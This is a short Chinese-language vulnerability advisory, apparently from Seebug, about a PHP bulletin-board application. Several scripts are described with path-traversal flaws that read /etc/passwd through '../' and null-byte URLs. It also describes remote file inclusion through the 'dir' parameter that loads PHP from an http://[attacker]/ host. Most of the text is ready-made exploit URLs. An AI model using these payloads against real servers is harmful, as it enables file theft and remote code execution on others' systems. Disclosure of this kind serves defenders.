远程用户可以提供包含多个'../'字符的数据作为参数提交给有漏洞的脚本处理,可以WEB进程权限查看任意文件内容: http://[target]/_head.php?_zb_path=../../../../../etc/passwd%00 http://[target]/include/write.php?dir=../../../../../etc/passwd%00 http://[target]/outlogin.php?_zb_path=../../../../../etc/passwd%00 'print_category.php'脚本没有正确过滤用户提供的'dir'参数,指定远程服务器上的任意PHP文件作为包含文件,可以WEB进程权限执行PHP命令: http://[target]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/ 另外几个zero_vote相关脚本也存在此问题,如: http://[target]/skin/zero_vote/login.php?dir=http://[attacker]/ http://[target]/skin/zero_vote/setup.php?dir=http://[attacker]/ http://[target]/skin/zero_vote/ask_password.php?dir=http://[attacker]/
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论